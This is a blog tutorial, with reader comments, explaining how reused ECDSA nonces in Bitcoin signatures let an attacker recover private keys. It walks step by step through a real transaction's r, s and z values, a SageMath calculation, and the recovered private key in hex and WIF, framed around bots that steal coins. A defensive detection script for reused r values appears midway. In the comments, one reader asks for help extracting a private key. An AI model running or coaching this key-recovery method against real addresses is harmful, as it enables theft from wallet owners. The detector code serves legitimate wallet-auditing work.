
Last month, hackers managed to steal more than 7,000 bitcoin from crypto exchange Binance, the world’s largest by volume. This week we learned about an old bitcoin exploit that can target certain wallets when used correctly. The catch is that few bitcoin companies or wallets re-use values when signing transactions these days, but people who are creating new copies of old coins and wallets generally don’t know about this.

Credits to Kill Joy (member on Hack Forums) for making this method public in his blog post.

“A lot of Russian bitcoin hackers have coded bots to automatically grab coins from vulnerable addresses” – Kill Joy, in his blog post.

The method targets transactions whose signatures re-use certain values. That re-use comes from poor knowledge, programming errors, or a broken random number generator.

If you take a look at this transaction: https://blockchain.info/tx/9ec4bc49e828d…0e3b29c4b1

There are two inputs and one output in this transaction. Inputs are pointers to outputs of previous transactions. Outputs are, at their most basic, an amount and an address.

Taking a closer look at the scripts of these two inputs, we notice that they are similar.

1.

`ScriptSig: PUSHDATA(71)[30440220d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1022044e1ff2dfd8102cf7a47c21d5c9fd5701610d04953c6836596b4fe9dd2f53e3e01] PUSHDATA(65)[04dbd0c61532279cf72981c3584fc32216e0127699635c2789f549e0730c059b81ae133016a69c21e23f1859a95f06d52b7bf149a8f2fe4e8535c8a829b449c5ff]`

2.

`ScriptSig: PUSHDATA(71)[30440220d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad102209a5f1c75e461d7ceb1cf3cab9013eb2dc85b6d0da8c3c6e27e3a5a5b3faa5bab01] PUSHDATA(65)[04dbd0c61532279cf72981c3584fc32216e0127699635c2789f549e0730c059b81ae133016a69c21e23f1859a95f06d52b7bf149a8f2fe4e8535c8a829b449c5ff]`

The beginning of each script contains the signature (made up of the two values ‘r’ and ‘s’). The end of the script is the hex public key.

So we have:

```
r1: d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1
r2: d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1
s1: 44e1ff2dfd8102cf7a47c21d5c9fd5701610d04953c6836596b4fe9dd2f53e3e
s2: 9a5f1c75e461d7ceb1cf3cab9013eb2dc85b6d0da8c3c6e27e3a5a5b3faa5bab
```

It turns out that the r values in the scripts are exactly the same. This means we can derive the private key.

`Bitcoin Private Key = (z1*s2 - z2*s1)/(r*(s1-s2))`

We have the r and s values; now we need to find the z1 and z2 values. For that, navigate to: https://2coin.org/

Enter in our transaction ID: 9ec4bc49e828d924af1d1029cacf709431abbde46d59554b62bc270e3b29c4b1

Scroll down to find the z values.

We find:

```
z1 = c0e2d0a89a348de88fda08211c70d1d7e52ccef2eb9459911bf977d587784c6e
z2 = 17b0f41c8c337ac1e18c98759e83a8cccbc368dd9d89e5f03cb633c265fd0ddc
```

Bitcoin uses an elliptic curve, secp256k1, for generating public keys. The signature arithmetic is done modulo the order of that curve's base point.

```
p = order of the secp256k1 base point (usually written n). So
p = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
```

We will need to create a finite field for the calculation.

`K = GF(p)`

Now that we have all the information we need, we can run our calculations.

We’ll use Sagemath: http://www.sagemath.org/

I will be using the cloud version. Make sure you input all of our equations:

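```
# p is the order of the secp256k1 base point (usually written n)
p = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
# r is shared by both signatures; s1 and s2 are the two s values
r = 0xd47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1
s1 = 0x44e1ff2dfd8102cf7a47c21d5c9fd5701610d04953c6836596b4fe9dd2f53e3e
s2 = 0x9a5f1c75e461d7ceb1cf3cab9013eb2dc85b6d0da8c3c6e27e3a5a5b3faa5bab
# z1 and z2 are the message hashes that each signature covers
z1 = 0xc0e2d0a89a348de88fda08211c70d1d7e52ccef2eb9459911bf977d587784c6e
z2 = 0x17b0f41c8c337ac1e18c98759e83a8cccbc368dd9d89e5f03cb633c265fd0ddc
# Finite field of integers modulo p; the division below becomes a modular inverse
K = GF(p)
K((z1*s2 - z2*s1)/(r*(s1-s2)))
```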

Click run:

The calculation outputs: 88865298299719117682218467295833367085649033095698151055007620974294165995414

Now we will convert it from decimal to hex. You can do so here: https://www.rapidtables.com/convert/numb…o-hex.html

Our private key in hex is: C477F9F65C22CCE20657FAA5B2D1D8122336F851A508A1ED04E479C34985BF96

From here we can convert it to a WIF (wallet import format). This represents the private key!

```
A WIF private key is a standard private key, but with a few added extras:
1. Version Byte prefix - Indicates which network the private key is to be used on.
0x80 = Mainnet
0xEF = Testnet
2. Compression Byte suffix (optional) - Indicates if the private key is used to create a compressed public key.
0x01
3. Checksum - Useful for detecting errors/typos when you type out your private key.
```

Go here: https://2coin.org/privateKeyToAddress.html

Enter in our hex private key.

Our private key in WIF is: 5KJp7KEffR7HHFWSFYjiCUAntRSTY69LAQEX1AUzaSBHHFdKEpQ
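The repeated r value in the two ScriptSigs above is a condition a wallet developer can test for in their own signing output. The following is an added example, not code from this article or from Kill Joy's post: it parses the `PUSHDATA(n)[hex]` notation used above, decodes each DER signature, and flags any public key that signed more than once with the same r. The function names are assumptions chosen for illustration.

```python
import re
from collections import defaultdict

PUSH = re.compile(r"PUSHDATA\((\d+)\)\[([0-9a-fA-F]+)\]")

def parse_der_int(buf, pos):
    """Read one DER INTEGER starting at buf[pos]; return (value, next_pos)."""
    if buf[pos] != 0x02:
        raise ValueError("expected INTEGER tag 0x02")
    end = pos + 2 + buf[pos + 1]
    if buf[pos + 1] == 0 or end > len(buf):
        raise ValueError("bad INTEGER length")
    # Read unsigned: old transactions carry non-strict DER (no 0x00 pad byte).
    return int.from_bytes(buf[pos + 2:end], "big"), end

def parse_scriptsig(text):
    """Return (pubkey_hex, r, s) from a 'PUSHDATA(n)[hex] ...' ScriptSig."""
    pushes = [bytes.fromhex(hx) for _n, hx in PUSH.findall(text)]
    declared = [int(n) for n, _hx in PUSH.findall(text)]
    if len(pushes) != 2 or [len(p) for p in pushes] != declared:
        raise ValueError("expected two pushes with matching lengths")
    sig, pubkey = pushes
    der = sig[:-1]  # the last byte is the sighash type, not part of the DER blob
    if len(der) < 8 or der[0] != 0x30 or der[1] != len(der) - 2:
        raise ValueError("bad SEQUENCE header")
    r, pos = parse_der_int(der, 2)
    s, pos = parse_der_int(der, pos)
    if pos != len(der):
        raise ValueError("trailing bytes after s")
    return pubkey.hex(), r, s

def find_reused_r(scriptsigs):
    """Map (pubkey, r) -> list of input indexes, keeping only repeated pairs."""
    seen = defaultdict(list)
    for i, text in enumerate(scriptsigs):
        pubkey, r, _s = parse_scriptsig(text)
        seen[(pubkey, r)].append(i)
    return {key: idx for key, idx in seen.items() if len(idx) > 1}

# The two inputs quoted in the article; both carry the same public key push.
PUB = " PUSHDATA(65)[04dbd0c61532279cf72981c3584fc32216e0127699635c2789f549e0730c059b81ae133016a69c21e23f1859a95f06d52b7bf149a8f2fe4e8535c8a829b449c5ff]"
ARTICLE_INPUTS = [
    "PUSHDATA(71)[30440220d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1022044e1ff2dfd8102cf7a47c21d5c9fd5701610d04953c6836596b4fe9dd2f53e3e01]" + PUB,
    "PUSHDATA(71)[30440220d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad102209a5f1c75e461d7ceb1cf3cab9013eb2dc85b6d0da8c3c6e27e3a5a5b3faa5bab01]" + PUB,
]

if __name__ == "__main__":
    for (pubkey, r), idx in find_reused_r(ARTICLE_INPUTS).items():
        print(f"inputs {idx} share r={r:064x} under key {pubkey[:16]}...")
```

Run over every signature a wallet produces before broadcast, a non-empty result means the nonce source is broken and the key should be treated as compromised.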


Hi, if the input is only one, how am I going to do it?

Hello!

Just because this method exists doesn’t mean it will work with every single wallet. 🙂

Oh! Ok, thanks.

Is this working?

Yes, it is.

Hello brother

Can you extract the private key for me?

Because I can’t find the raw transaction until I can find the values of r, s

Prefer this my wallet address: 3DnHu2NHD22gY3eTDinXs4fJgegQLFSgpH

You can take any amount you want just help me take out the private key

and I will thank you very much

It has no balance. Plus it is illegal. 🙂

How to find raw transaction

Hello, can you tell me please how to extract raw transaction from transaction ID?

You did not explain this part of the tutorial:

Bitcoin uses an elliptical curve for generating public keys. The order of the curve is secp256k1.

p = parameter for the secp256k1 curve. So

p = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141

How is the ‘P’ parameter gotten?

Any reply please? I just wanna know how to extract raw transaction from transaction ID

Can't find z1 and z2 from https://2coin.org/

It's showing blank after entering transaction ID